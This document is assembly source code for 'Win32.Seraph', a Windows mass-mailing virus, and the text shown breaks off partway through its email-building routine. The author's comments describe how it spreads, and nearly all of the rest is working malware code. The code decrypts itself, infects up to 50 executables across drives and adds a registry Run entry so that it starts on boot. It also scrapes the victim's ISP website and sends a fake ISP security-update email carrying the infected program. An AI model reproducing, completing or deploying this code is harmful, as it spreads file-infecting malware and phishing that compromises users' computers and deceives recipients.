; ; [ Win32.Seraph@mm Vorgon/iKX ] ; [ 28672 bytes Target - PE ] ; [ 09/28/03 Made in Canada ] ; ; ; ; ; [ Introduction ] ; ; Seraph is a mass-mailing virus that takes advantage of social engineering. This may sound ; boring to you, but it takes social engineering to the next level. Seraph is an information ; gatherer. It takes data from websites, computers, URL's and uses what it finds to generate ; a convincing and personal email message. ; ; So what information does Seraph gather? Seraph gathers information about the Internet service ; provider of the computers it infects. Information such as: ; ; ISP Name example: AOL ; Domain example: AOL.COM ; Website example: WWW.AOL.COM ; Logo example: HTTP://www.aol.com/logo.gif ; Deadline example: SEPTEMBER 21, 2003 ; Copyright String example: (C) 2003 AOL INC. ; ; What does Seraph do with this information? Seraph takes everything you see above and generates ; an email message in HTML format. The message containing a logo image, names, valid email ; addresses, etc, appears to be a security update from your ISP. Unsuspecting victims reading this ; email message see that they must install the attached update by the deadline date, or face ; disconnection of there Internet service. ; ; How does Seraph know the email addresses of other people on the same ISP? Seraph takes a list ; of the 1024 most popular surnames in the USA and randomly selects one. It then a appends a first ; initial either the start or the end of the surname. This gives a possible 53238 email addresses ; per ISP. ; ; Sure this will spread to users on the same ISP, but how does it spread to other ISP's? Seraph ; is highly infectious. Every time it runs it infects 50 files on all drives it can find on a ; computer, except CD-ROM and drive A. It will naturally find executables in file sharing ; directories, shared folders, and anything else you can imagine. ; ; ; [ Other ] ; ; I named this virus after Seraph from the Matrix Reloaded. Seraph (the Chinese guy Neo meets ; before meeting the Oracle) had golden code and was so spectacular because he came from the first ; incarnation of the matrix, which was heaven. "Seraph" is singular for the plural "seraphim". The ; seraphim are the highest choir of angels and included amongst others: Lucifer, Gabriele, Raziel ; and Malaciah, and they sit on the 8th level of Heaven just one below God. ; ; ; [ Bug Fixes ] ; ; Below are a list of bugs i have fixed in this version. ; ; -The find file code begins searching at the start of the first drive instead of the current ; Directory. This bug was causing the entire contents of the most important drive to be excluded ; from the search. ; ; -Files in the system directory are no longer infected. Infecting files in this directory was ; causing Windows to not boot at all. ; ; -The program to be run on start-up is no longer whatever infected program is executed. It has ; been changed to the program that was last infected. Before if the user deleted the infected ; email attachment after executing the virus it would not be able to run on start-up. ; ; ; [ The Infection ] ; ; Below is a break down of what the virus does in order: ; ; - Decrypt the virus ; - Get the address of GetModuleHandleA ; - Get the kernel32.dll address ; - Get the address of GetProcAddress ; - Load the win9x API functions ; - Create a thread to execute the rest of the virus code ; - Infect 50 files on drives B-Z, excluding CD-ROM ; - Make the last file infected run on start-up ; - Display an install message if the filename is patch110.exe ; - On February 23 display the pay load ; - Load the win2k API functions if the OS version permits ; - Get the IP address of the computer ; - Get the hostname of the computer ; - Extract the ISP domain from the host name of the computer ; - Download the main page of the internet service provider and handle redirections ; - Search the webpage for a logo image URL ; - Get the company name of the ISP ; - Create a dead line date for the email message ; - Generate an email address ; - Create the email message using all the data collected ; - Send the email message ; - Send the current host EXE as the update attachment. ; - Exit the thread ; ; ; [ Assembling ] ; ; tasm32 /ml /jLOCALS seraph ; tlink32 -aa -x /Tpe /c seraph,seraph,,import32.lib,, ; editbin /SECTION:CODE,rwe seraph.exe ; ; ; [ Greetz ] ; ; T00fic, Morphine, Eddow, Raid, Gigabyte, Kefi, SPTH, Kernel32 ; ; .486p .MODEL flat, stdcall EXTRN GetModuleHandleA : PROC ;-------------------------------------------------------------------------------------------------; ; Constants ; ;-------------------------------------------------------------------------------------------------; ; file I/O constants OPEN_EXISTING EQU 3 GENERIC_READ EQU 80000000h GENERIC_WRITE EQU 40000000h FILE_SHARE_READ EQU 1 FILE_SHARE_WRITE EQU 2 FILE_BEGIN EQU 0 FILE_END EQU 2 ; DNS constants DNS_QUERY_STANDARD EQU 0 DNS_TYPE_PTR EQU 12 DNS_TYPE_MX EQU 15 DNSREC_ANSWER EQU 1 DNS_FREE_RECORD_LIST_DEEP EQU 1 ; winsock constants AF_INET EQU 2 SOCK_STREAM EQU 1 PCL_NONE EQU 0 SO_RCVTIMEO EQU 1006h SO_SNDTIMEO EQU 1005h SOL_SOCKET EQU 0FFFFh ; registry constants HKEY_LOCAL_MACHINE EQU 80000002h REG_SZ EQU 1 ; MISC constants GMEM_FIXED EQU 0 SECTION_RWE EQU 0E0000020h TRUE EQU 1 FALSE EQU 0 EXIT_THREAD EQU 1 CRLF EQU 13, 10 DRIVE_CDROM EQU 5 ;-------------------------------------------------------------------------------------------------; ; Structures ; ;-------------------------------------------------------------------------------------------------; PE_HEADER STRUC dwSignature DD 0 wMachine DW 0 wNumberOfSections DW 0 dwTimeDateStamp DD 0 dwPointerToSymbolTable DD 0 dwNumberOfSymbols DD 0 wSizeOfOptionalHeader DW 0 wCharacteristics DW 0 wMagic DW 0 cMajorLinkerVersion DB 0 cMinorLinkerVersion DB 0 dwSizeOfCode DD 0 dwSizeOfInitializedData DD 0 dwSizeOfUninitializedData DD 0 dwAddressOfEntryPoint DD 0 dwBaseOfCode DD 0 dwBaseOfData DD 0 dwImageBase DD 0 dwSectionAlignment DD 0 dwFileAlignment DD 0 wMajorOperatingSystemVersion DW 0 wMinorOperatingSystemVersion DW 0 wMajorImageVersion DW 0 wMinorImageVersion DW 0 wMajorSubsystemVersion DW 0 wMinorSubsystemVersion DW 0 dwReserved1 DD 0 dwSizeOfImage DD 0 dwSizeOfHeaders DD 0 dwCheckSum DD 0 wSubsystem DW 0 wDllCharacteristics DW 0 dwSizeOfStackReserve DD 0 dwSizeOfStackCommit DD 0 dwSizeOfHeapReserve DD 0 dwSizeOfHeapCommit DD 0 dwLoaderFlags DD 0 dwNumberOfRvaAndSizes DD 0 dwExportDirectoryVA DD 0 dwExportDirectorySize DD 0 dwImportDirectoryVA DD 0 dwImportDirectorySize DD 0 dwResourceDirectoryVA DD 0 dwResourceDirectorySize DD 0 dwExceptionDirectoryVA DD 0 dwExceptionDirectorySize DD 0 dwSecurityDirectoryVA DD 0 dwSecurityDirectorySize DD 0 dwBaseRelocationTableVA DD 0 dwBaseRelocationTableSize DD 0 dwDebugDirectoryVA DD 0 dwDebugDirectorySize DD 0 dwArchitectureSpecificDataVA DD 0 dwArchitectureSpecificDataSize DD 0 dwRVAofGPVA DD 0 dwRVAofGPSize DD 0 dwTLSDirectoryVA DD 0 dwTLSDirectorySize DD 0 dwLoadConfigurationDirectoryVA DD 0 dwLoadConfigurationDirectorySize DD 0 dwBoundImportDirectoryinheadersVA DD 0 dwBoundImportDirectoryinheadersSize DD 0 dwImportAddressTableVA DD 0 dwImportAddressTableSize DD 0 dwDelayLoadImportDescriptorsVA DD 0 dwDelayLoadImportDescriptorsSize DD 0 dwCOMRuntimedescriptorVA DD 0 dwCOMRuntimedescriptorSize DD 0 dwNULL1 DD 0 dwNULL2 DD 0 PE_HEADER ENDS SECTION_HEADER STRUC sAnsiName DB 8 DUP(0) dwVirtualSize DD 0 dwVirtualAddress DD 0 dwSizeOfRawData DD 0 dwPointerToRawData DD 0 dwPointerToRelocations DD 0 dwPointerToLinenumbers DD 0 wNumberOfRelocations DW 0 wNumberOfLinenumbers DW 0 dwCharacteristics DD 0 SECTION_HEADER ENDS DOS_HEADER STRUC wSignature DW 0 wBytesInLastBlock DW 0 wBlocksInFile DW 0 wNumberOfRelocs DW 0 wHeaderParagraphs DW 0 wMinExtraParagraphs DW 0 wMaxExtraParagraphs DW 0 wSS DW 0 wSP DW 0 wChecksum DW 0 wIP DW 0 wCS DW 0 wRelocTableOffset DW 0 wOverlayNumber DW 0 sUnused DB 32 DUP(0) lpPEHeader DD 0 DOS_HEADER ENDS WSA_DATA STRUC wVersion DW 0 wHighVersion DW 0 szDescription DB 257 dup(0) szSystemStatus DB 129 dup(0) iMaxSockets DW 0 iMaxUdpDg DW 0 lpVendorInfo DD 0 WSA_DATA ENDS SOCK_ADDRESS STRUC sin_family DW 0 sin_port DW 0 sin_addr DD 0 sin_zero DB 8 dup(0) SOCK_ADDRESS ENDS DNS_RECORD STRUC pNext DD 0 pName DD 0 wType DW 0 wDataLength DW 0 flags DD 0 dwTtl DD 0 dwReserved DD 0 DNS_RECORD ENDS SYSTEM_TIME STRUC wYear DW 0 wMonth DW 0 wDayOfWeek DW 0 wDay DW 0 wHour DW 0 wMinute DW 0 wSecond DW 0 wMiliseconds DW 0 SYSTEM_TIME ENDS WIN32_FIND_DATA STRUC FileAttributes DD 0 CreateTime DQ 0 LastAccessTime DQ 0 LastWriteTime DQ 0 FileSizeHigh DD 0 FileSizeLow DD 0 Reserved0 DD 0 Reserved1 DD 0 FullFileName DB 260 dup(0) AlternateFileName DB 14 dup(0) WIN32_FIND_DATA ENDS ;-------------------------------------------------------------------------------------------------; ; Macros ; ;-------------------------------------------------------------------------------------------------; ImportTable MACRO tableName &tableName: ENDM EndImport MACRO DB 0 ENDM EndImportTable MACRO DB '$' ENDM ImportDll MACRO dllName sz&dllName DB '&dllName', '.dll', 0 ENDM ImportFunction MACRO functionName sz&functionName DB '&functionName', 0 &functionName DD 0 ENDM ApiCall MACRO functionName call [ebp+&functionName] ENDM pushptr MACRO variable lea eax, [ebp+&variable] push eax ENDM pushval MACRO variable push [ebp+&variable] ENDM .DATA DD 0 ; TASM gayness ;-------------------------------------------------------------------------------------------------; ; Code Section ; ;-------------------------------------------------------------------------------------------------; .CODE main: ;-------------------------------------------------------------------------------------------------; ; Load the virus and its resources. ; ;-------------------------------------------------------------------------------------------------; ; get the delta pointer call getDeltaPointer ; where am i?!?! getDeltaPointer: pop edi mov ebp, edi sub ebp, offset getDeltaPointer ; very basic XOR decryption to hide strings cmp ebp, 0 je encrypted lea esi, [ebp+encrypted] mov ecx, CODE_SIZE - (offset encrypted - offset main) decrypt: xor byte ptr [esi], 123 inc esi loop decrypt ; all code from this point on will be encrypted encrypted: ; get the image base sub edi, 5 mov [ebp+lpStartOfCode], edi ; save the start of code and edi, 0FFFFF000h ; round off the VA to the nearest page findImageBase: cmp word ptr [edi], 'ZM' ; start of image? je findKernel sub edi, 1000h jmp findImageBase ; find the address of the kernel32 findKernel: mov [ebp+lpImageBase], edi mov eax, edi mov ebx, [eax+3ch] ; ebx = pointer to the PE header mov esi, [ebx+eax+128] add esi, eax ; esi = pointer to the import section xor ecx, ecx findKernel32: mov ebx, [esi+ecx+12] ; get an RVA to the dll name cmp ebx, 0 ; no more dll's left? je returnHostControl add ebx, eax cmp dword ptr [ebx], 'NREK' ; Kernel32.dll found? je findGetModuleHandleA add ecx, 20 ; next import jmp findKernel32 findGetModuleHandleA: mov edx, [esi+ecx] sub edx, 4 lea esi, [esi+ecx] xor ecx, ecx findName: inc ecx add edx, 4 mov ebx, [edx+eax] ; next name cmp ebx, 0 ; no more function names left? je returnHostControl lea ebx, [ebx+eax+2] cmp dword ptr [ebx], 'MteG' jne findName cmp dword ptr [ebx+4], 'ludo' jne findName cmp dword ptr [ebx+8], 'naHe' jne findName cmp dword ptr [ebx+12], 'Aeld' ; GetModuleHandleA? jne findName ; get the address of the GetModuleHandleA function mov esi, [esi+16] add esi, eax rep lodsd ; create the string "kernel32.dll" on the stack push 0 push dword ptr 'lld.' push dword ptr '23le' push dword ptr 'nrek' ; call GetModuleHandleA to retrieve the address of the kernel32.dll push esp call eax mov [ebp+lpKernel32], eax ; save the kernel32 address ; get the address of the GetProcAddress API function mov ebx, [eax+3ch] add ebx, eax mov ebx, [ebx+120] ; get the export table VA add ebx, eax mov esi, [ebx+28] ; get the VA of the address table add esi, eax mov edi, [ebx+32] ; get the VA of the name table add edi, eax mov ecx, [ebx+36] ; get the VA of the ordinal table add ecx, eax findGetProcAddress: add ecx, 2 ; next ordinal add edi, 4 ; next name mov edx, [edi] add edx, eax cmp dword ptr [edx], 'PteG' jne findGetProcAddress cmp dword ptr [edx+4], 'Acor' ; GetProcAddress? jne findGetProcAddress mov cx, [ecx] and ecx, 0FFFFh add ecx, [ebx+16] ; add ordinal base rep lodsd ; get the VA address corrasponding to the ordinal add eax, [ebp+lpKernel32] mov [ebp+GetProcAddress], eax ; get the address of the LoadLibraryA API function pushptr szLoadLibraryA pushval lpKernel32 ApiCall GetProcAddress mov [ebp+LoadLibraryA], eax ; load the Windows 9x API functions lea eax, [ebp+API_Imports_9x] call LoadImports cmp eax, -1 je apiLoadError ; create a thread to execute the rest of the code pushptr hThread push 0 push ebp ; pass the delta pointer to the thread pushptr background push 0 push 0 ApiCall CreateThread ; if /iKX is present in the command line then loop until the thread closes ApiCall GetCommandLineA mov ecx, 256 parseCommandLine: cmp dword ptr [eax], 'XKi/' je wait inc eax loop parseCommandLine ; if this is not the first generation then return control to the host cmp ebp, 0 jne returnHostControl ; if this is the first generation then loop until the thread closes wait: cmp [ebp+dwThreadStatus], EXIT_THREAD jne wait push 0 ApiCall ExitProcess ; return control to the host returnHostControl: mov eax, [ebp+lpReturnAddress] add eax, [ebp+lpImageBase] push eax ret ; if an api function cannot be loaded then either return control to the host or exit program apiLoadError: cmp ebp, 0 jne returnHostControl push 0 ApiCall ExitProcess ;-------------------------------------------------------------------------------------------------; ; Background Thread. ; ;-------------------------------------------------------------------------------------------------; background: mov ebp, [esp+4] ; restore the delta offset ;-------------------------------------------------------------------------------------------------; ; Infect 50 files in drives B-Z, except the CD-ROM drive. ; ;-------------------------------------------------------------------------------------------------; xor esi, esi ; files infected counter mov byte ptr [ebp+szDrive], 'A' ; set the drive to start searching at nextDrive: inc byte ptr [ebp+szDrive] ; next drive cmp byte ptr [ebp+szDrive], 'Z'+1 ; all drives searched? je payload pushptr szDrive ApiCall GetDriveTypeA cmp eax, DRIVE_CDROM ; CD-ROM drive? je nextDrive pushptr szDrive ApiCall SetCurrentDirectoryA ; set the current directory to the root of that drive cmp eax, 0 je nextDrive findFiles: mov edi, esp ; save the stack pointer push 0BAADF00Dh ; end of files marker findFirstFile: pushptr win32FindData pushptr szSearchString ApiCall FindFirstFileA ; find the first file mov [ebp+hFind], eax checkType: cmp eax, 0 je downDirectory cmp byte ptr [ebp+win32FindData.FullFileName], '.' je findNextFile cmp [ebp+win32FindData.FileAttributes], 10h je upDirectory cmp [ebp+win32FindData.FileAttributes], 30h je upDirectory ; check the file extension for .exe or .scr push edi mov al, '.' mov ecx, 260 lea edi, [ebp+win32FindData.FullFileName] repne scasb ; seek to the file extension mov eax, [edi-1] pop edi and eax, 0DFDFDFFFh ; make upper case cmp eax, 'EXE.' ; executable file? je infectFile cmp eax, 'RCS.' ; screen saver? je infectFile jmp findNextFile infectFile: ; check to see if the file is a valid PE executable and is not already infected push esi push edi lea esi, [ebp+win32FindData.FullFileName] call IsValid pop edi pop esi cmp eax, -1 je findNextFile ; if the executable file is in the system directory then dont infect it push 256 pushptr szSystemDirectory ApiCall GetSystemDirectoryA pushptr szSystemDirectory ApiCall CharUpperA pushptr szCurrentDirectory push 256 ApiCall GetCurrentDirectoryA pushptr szCurrentDirectory ApiCall CharUpperA pushptr szSystemDirectory pushptr szCurrentDirectory ApiCall lstrcmpA cmp eax, 0 je findNextFile ; infect the file push esi lea esi, [ebp+win32FindData.FullFileName] call AttachCode pop esi cmp eax, -1 je findNextFile ; increment the file infection counter inc esi cmp esi, 50 ; infect 50 files jne findNextFile ; if 50 files have been infected stop searching mov esp, edi jmp searchComplete findNextFile: pushptr win32FindData pushval hFind ApiCall FindNextFileA ; find the next file jmp checkType upDirectory: pushptr win32FindData.FullFileName ApiCall SetCurrentDirectoryA cmp eax, 0 je findNextFile pushval hFind ; save the find handle jmp findFirstFile downDirectory: pushptr szBackDir ApiCall SetCurrentDirectoryA pushval hFind ApiCall FindClose ; close the find handle pop [ebp+hFind] ; restore the previous find handle cmp [ebp+hFind], 0BAADF00Dh ; no more files left to find? jne findNextFile mov esp, edi ; restore the stack pointer jmp nextDrive ; find another drive to infect searchComplete: ;-------------------------------------------------------------------------------------------------; ; Make it so the last infected file runs on start-up. ; ;-------------------------------------------------------------------------------------------------; ; copy the current path to a buffer pushptr szCurrentDirectory pushptr szModuleName ApiCall lstrcpyA ; append a slash pushptr szSlash pushptr szModuleName ApiCall lstrcatA ; append the executable file name pushptr win32FindData.FullFileName pushptr szModuleName ApiCall lstrcatA ; concat the commandline parameter /iKX to the key value pushptr szIkxParameter pushptr szModuleName ApiCall lstrcatA ; open "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" pushptr hKey pushptr szSubKey push HKEY_LOCAL_MACHINE ApiCall RegOpenKeyA cmp eax, 0 jne exitThread ; get the length of the module name pushptr szModuleName ApiCall lstrlenA ; set the start-up program push eax pushptr szModuleName push REG_SZ push 0 pushptr szValueName pushval hKey ApiCall RegSetValueExA ; close the key pushval hKey ApiCall RegCloseKey ;-------------------------------------------------------------------------------------------------; ; Display the patch install message if the module name is "patch110.exe" ; ;-------------------------------------------------------------------------------------------------; ; get the path and name of this program push 256 pushptr szModuleName push 0 ApiCall GetModuleFileNameA ; seek to a dot lea edi, [ebp+szModuleName] mov al, '.' mov ecx, 256 repne scasb ; seek backwards to a slash std mov al, '\' repne scasb cld add edi, 2 ; compair the filename to "patch110.exe" mov ecx, 12 lea esi, [ebp+szPatchName] rep cmpsb cmp ecx, 0 jne payload ; display the patch install message push 0 pushptr szPatchTitle pushptr szPatchInstall push 0 ApiCall MessageBoxA ;-------------------------------------------------------------------------------------------------; ; Display a poem by John Keats on the day of his death. ; ;-------------------------------------------------------------------------------------------------; payload: ; get today's date pushptr date ApiCall GetSystemTime ; Feb 23? cmp [ebp+date.wMonth], 2 jne loadImports cmp word ptr [ebp+date.wDay], 24 jne loadImports ; display poem push 0 pushptr szTitle pushptr szElginMarbles push 0 ApiCall MessageBoxA ;-------------------------------------------------------------------------------------------------; ; Load the Windows 2k Imports. ; ;-------------------------------------------------------------------------------------------------; loadImports: ; Windows 2k+ OS? ApiCall GetVersion cmp al, 5 jl exitThread ; load the Windows 2k API functions lea eax, [ebp+API_Imports_2k] call LoadImports cmp eax, -1 je exitThread ; internet connection? push 0 pushptr dwConnectionState ApiCall InternetGetConnectedState cmp eax, FALSE je exitThread ;-------------------------------------------------------------------------------------------------; ; Get the IP address of this computer. ; ;-------------------------------------------------------------------------------------------------; ; initialize winsock pushptr wsaData push 0101h ApiCall WSAStartup cmp eax, 0 jne exitThread ; get the local host name of this computer push 132 pushptr szHostName ApiCall gethostname cmp eax, 0 jne exitThread ; clear the reverse IP buffer push 29 pushptr szReverseIP ApiCall RtlZeroMemory ; get the IP address of the local host pushptr szHostName ApiCall gethostbyname cmp eax, 0 je exitThread mov eax, [eax+12] mov eax, [eax] mov eax, [eax] ;-------------------------------------------------------------------------------------------------; ; Get the host name of this computer. ; ;-------------------------------------------------------------------------------------------------; getHostName: bswap eax ; reverse the byte order of the IP ; convert the IP address to a string push eax ApiCall inet_ntoa ; copy the reverse IP string to the buffer push eax pushptr szReverseIP ApiCall lstrcpyA ; concat the .in-addr.arpa string pushptr szArpa pushptr szReverseIP ApiCall lstrcatA ; query a DNS server for the host name of this computer push 0 pushptr lpResults push 0 push DNS_QUERY_STANDARD push DNS_TYPE_PTR pushptr szReverseIP ApiCall DnsQuery_A cmp eax, 0 jne exitThread ; was an answer record found? push size DNS_RECORD pushval lpResults pushptr dnsRecordHeader ApiCall RtlMoveMemory mov eax, [ebp+dnsRecordHeader.flags] and al, 00000011b cmp al, DNSREC_ANSWER jne exitThread ; clear the szHostName buffer push 132 pushptr szHostName ApiCall RtlZeroMemory ; get the host name from the DNS response message mov eax, [ebp+lpResults] add eax, size DNS_RECORD mov eax, [eax] push eax pushptr szHostName ApiCall lstrcpyA ; release the DNS record list push DNS_FREE_RECORD_LIST_DEEP pushval lpResults ApiCall DnsRecordListFree ;-------------------------------------------------------------------------------------------------; ; Extract the ISP host name from this computers host name. ; ;-------------------------------------------------------------------------------------------------; ; seek to the end of the domain lea esi, [ebp+szHostName] push esi ApiCall lstrlenA add esi, eax ; seek backwards to a period or the start of domain findPeriod: dec esi lea eax, [ebp+szHostName] cmp esi, eax ; start of host name? je copyFullDomain cmp byte ptr [esi], '.' jne findPeriod mov ebx, esi ; compair domains lea edi, [ebp+topDomains] compairDomain: mov al, [ebx+1] mov ah, [edi] inc ebx inc edi cmp ax, 0 je findPeriod cmp ax, 002Eh je findPeriod cmp al, ah je compairDomain ; seek to the next domain in the list push edi ApiCall lstrlenA add edi, eax inc edi ; no more domains left? mov ebx, esi cmp byte ptr [edi], '$' jne compairDomain inc esi copyFullDomain: ; clear the szIspHostName buffer push 132 pushptr szIspDomainName ApiCall RtlZeroMemory ; copy the domain to a buffer push esi pushptr szIspDomainName ApiCall lstrcpyA ;-------------------------------------------------------------------------------------------------; ; Download the main webpage of the Internet Service Provider. ; ;-------------------------------------------------------------------------------------------------; ; allocate 64k for the webpage push 65536 push GMEM_FIXED ApiCall GlobalAlloc cmp eax, 0 je exitThread mov [ebp+lpWebpage], eax ; initialize wininet push 0 push 0 push 0 push 0 push 0 ApiCall InternetOpenA cmp eax, 0 je exitThread mov [ebp+hInternet], eax ; copy the domain to a buffer pushptr szWWW pushptr szIspWebpage ApiCall lstrcpyA ; concat the ISP domain pushptr szIspDomainName pushptr szIspWebpage ApiCall lstrcatA ; open the webpage URL openUrl: push 0 push 0 push 0 push 0 pushptr szIspWebpage pushval hInternet ApiCall InternetOpenUrlA cmp eax, 0 je exitThread mov [ebp+hFile], eax ; download the webpage mov edi, [ebp+lpWebpage] xor esi, esi downloadWebpage: pushptr dwNumberOfBytes push 65536 push edi pushval hFile ApiCall InternetReadFile add edi, [ebp+dwNumberOfBytes] add esi, [ebp+dwNumberOfBytes] cmp [ebp+dwNumberOfBytes], 0 jne downloadWebpage mov [ebp+dwWebpageSize], esi ; if the webpage size is greater then 500 bytes then find the logo cmp esi, 500 jg findLogoUrl ;-------------------------------------------------------------------------------------------------; ; Handle webpage redirections. ; ;-------------------------------------------------------------------------------------------------; ; find a URL in the webpage xor ecx, ecx mov edx, esi mov edi, [ebp+lpWebpage] lea esi, [ebp+szIspWebpage] findUrl: mov eax, [edi] and eax, 00FFFFFFh cmp eax, 2F2F3Ah je findUrlStart inc edi inc ecx cmp ecx, edx jne findUrl jmp exitThread ; find the start of the URL findUrlStart: cmp byte ptr [edi], '"' je copyUrl cmp byte ptr [edi], ' ' je copyUrl cmp byte ptr [edi], '=' je copyUrl cmp byte ptr [edi], '(' je copyUrl dec edi dec ecx cmp ecx, 0 jne findUrlStart jmp exitThread ; copy the URL to a buffer copyUrl: inc edi inc ecx mov al, [edi] mov [esi], al inc esi cmp ecx, edx je exitThread cmp al, '"' je copyComplete cmp al, ' ' je copyComplete cmp al, ')' je copyComplete jmp copyUrl ; zero terminate the URL and download the webpage copyComplete: mov byte ptr [esi-1], 0 jmp openUrl ;-------------------------------------------------------------------------------------------------; ; Find a logo image URL on the webpage. ; ;-------------------------------------------------------------------------------------------------; findLogoUrl: ; find the word "logo" xor ecx, ecx mov esi, [ebp+lpWebpage] lea edi, [ebp+szUrl] findLogo: mov eax, [esi] and eax, 0DFDFDFDFh cmp eax, 'OGOL' je findType cmp ecx, [ebp+dwWebpageSize] je exitThread inc esi inc ecx jmp findLogo ; find the file extension ".gif" or ".jpg" findType: mov eax, [esi] cmp al, ' ' je findLogo and eax, 0DFDFDFFFh cmp eax, 'FIG.' je findImgStart cmp eax, 'GPJ.' je findImgStart cmp ecx, [ebp+dwWebpageSize] je exitThread inc esi inc ecx jmp findType ; find the start of the image URL findImgStart: mov al, [esi] cmp al, ' ' je copyImage cmp al, '=' je copyImage cmp al, '(' je copyImage cmp al, '"' je copyImage cmp ecx, 0 je exitThread dec esi dec ecx jmp findImgStart ; copy the image URL to a buffer copyImage: inc esi mov al, [esi] mov [edi], al cmp al, ' ' je imageCopied cmp al, '"' je imageCopied cmp al, ')' je imageCopied cmp al, '>' je imageCopied cmp ecx, [ebp+dwWebpageSize] je exitThread inc ecx inc edi jmp copyImage imageCopied: mov byte ptr [edi], 0 ; only the image name specified in the URL? lea edi, [ebp+szUrl] mov ecx, 132 mov al, '/' repne scasb mov edx, 1 jecxz makeFullUrl ; only the image path/name specified in the URL? lea edi, [ebp+szUrl] mov ecx, 132 mov al, ':' repne scasb mov edx, 0 jecxz makeFullUrl ; copy the full URL to a buffer pushptr szUrl pushptr szLogoUrl ApiCall lstrcpyA jmp logoParseComplete ; create a complete URL containing a scheme, hostname and path. makeFullUrl: lea edi, [ebp+szIspWebpage] mov ecx, 132 mov al, '.' repne scasb mov eax, 132 sub eax, ecx mov ecx, eax findDomainEnd: inc ecx inc edi cmp ecx, 132 je exitThread mov al, [edi] cmp al, 0 je copyDomain cmp al, '/' je copyDomain jmp findDomainEnd copyDomain: lea edi, [ebp+szLogoUrl] lea esi, [ebp+szIspWebpage] rep movsb cmp edx, 0 je concatPath mov byte ptr [edi], '/' inc edi concatPath: pushptr szUrl push edi ApiCall lstrcpyA logoParseComplete: ;-------------------------------------------------------------------------------------------------; ; Get the company name of the ISP. ; ;-------------------------------------------------------------------------------------------------; ; copy the company name to a buffer lea edi, [ebp+szIspName] lea esi, [ebp+szIspDomainName] copyCompanyName: mov al, [esi] cmp al, '.' je companyNameCopied mov [edi], al inc esi inc edi jmp copyCompanyName companyNameCopied: mov byte ptr [edi], 0 ; make the first letter upper case lea edi, [ebp+szIspName] and byte ptr [edi], 0DFh ;-------------------------------------------------------------------------------------------------; ; Create a deadline date for the email message ; ;-------------------------------------------------------------------------------------------------; ; get today's date pushptr date ApiCall GetSystemTime ; set the dead line date mov [ebp+date.wDay], 1 inc [ebp+date.wMonth] cmp [ebp+date.wMonth], 13 jl convertDate mov [ebp+date.wMonth], 1 inc [ebp+date.wYear] ; convert the date to a string convertDate: push 25 pushptr szDeadLine pushptr szDateFormat pushptr date push 0 push 0 ApiCall GetDateFormatA ;-------------------------------------------------------------------------------------------------; ; Generate a username to send the email message to. ; ;-------------------------------------------------------------------------------------------------; xor si, si ; clear the email account buffer push 25 pushptr szEmailAccount ApiCall RtlZeroMemory ; generate a number from 0-1 ApiCall GetTickCount and ax, 8000h shr ax, 15 mov si, ax cmp ax, 0 je getName ; generate a number from 0-25 preLetter: ApiCall GetTickCount and ax, 7C00h shr ax, 10 cmp al, 26 jge preLetter add al, 'A' mov byte ptr [ebp+szEmailAccount], al ; generate a number from 0-1023 getName: ApiCall GetTickCount and ax, 3FFh xor ecx, ecx mov cx, ax ; find the name corrusponding to the number lea edi, [ebp+lastnames] jecxz displayName seekToName: push ecx mov ecx, 25 xor al, al repne scasb pop ecx loop seekToName displayName: push edi pushptr szEmailAccount ApiCall lstrcatA ; generate a trailing letter if specified cmp si, 1 je nameComplete postLetter: ApiCall GetTickCount and ax, 7C00h shr ax, 10 mov dl, al cmp dl, 26 jge postLetter add dl, 'A' xor al, al lea edi, [ebp+szEmailAccount] mov ecx, 25 repne scasb mov byte ptr [edi-1], dl nameComplete: ;-------------------------------------------------------------------------------------------------; ; Get a mail server name. ; ;-------------------------------------------------------------------------------------------------; ; query a DNS server for a list of the ISP's mail servers push 0 pushptr lpResults push 0 push DNS_QUERY_STANDARD push DNS_TYPE_MX pushptr szIspDomainName ApiCall DnsQuery_A cmp eax, 0 jne exitThread ; was an answer record found? push size DNS_RECORD pushval lpResults pushptr dnsRecordHeader ApiCall RtlMoveMemory mov eax, [ebp+dnsRecordHeader.flags] and al, 00000011b cmp al, DNSREC_ANSWER jne exitThread ; clear the szMailServer buffer push 132 pushptr szMailServer ApiCall RtlZeroMemory ; get the host name from the DNS response message mov eax, [ebp+lpResults] add eax, size DNS_RECORD mov eax, [eax] push eax pushptr szMailServer ApiCall lstrcpyA ; release the DNS record list push DNS_FREE_RECORD_LIST_DEEP pushval lpResults ApiCall DnsRecordListFree ;-------------------------------------------------------------------------------------------------; ; Create the email message. ; ;-------------------------------------------------------------------------------------------------; ; allocate 4k of memory for the email message push 4096 push GMEM_FIXED ApiCall GlobalAlloc cmp eax, 0 je exitThread mov [ebp+lpEmailMessage], eax ; clear the buffer push 4096 pushval lpEmailMessage ApiCall RtlZeroMemory ; concat part 1 of the email message pushptr szEmailPart1 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP domain name pushptr szIspDomainName pushval lpEmailMessage ApiCall lstrcatA ; concat part 2 of the email message pushptr szEmailPart2 pushval lpEmailMessage ApiCall lstrcatA ; concat the email account name pushptr szEmailAccount pushval lpEmailMessage ApiCall lstrcatA ; concat part 3 of the email message pushptr szEmailPart3 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP domain name pushptr szIspDomainName pushval lpEmailMessage ApiCall lstrcatA ; concat part 4 of the email message pushptr szEmailPart4 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 5 of the email message pushptr szEmailPart5 pushval lpEmailMessage ApiCall lstrcatA ; concat the logo URL pushptr szLogoUrl pushval lpEmailMessage ApiCall lstrcatA ; concat part 6 of the email message pushptr szEmailPart6 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 7 of the email message pushptr szEmailPart7 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 8 of the email message pushptr szEmailPart8 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 9 of the email message pushptr szEmailPart9 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 10 of the email message pushptr szEmailPart10 pushval lpEmailMessage ApiCall lstrcatA ; concat the ISP company name pushptr szIspName pushval lpEmailMessage ApiCall lstrcatA ; concat part 11 of the email message pushptr szEmailPart11 pushval lpEmailMessage 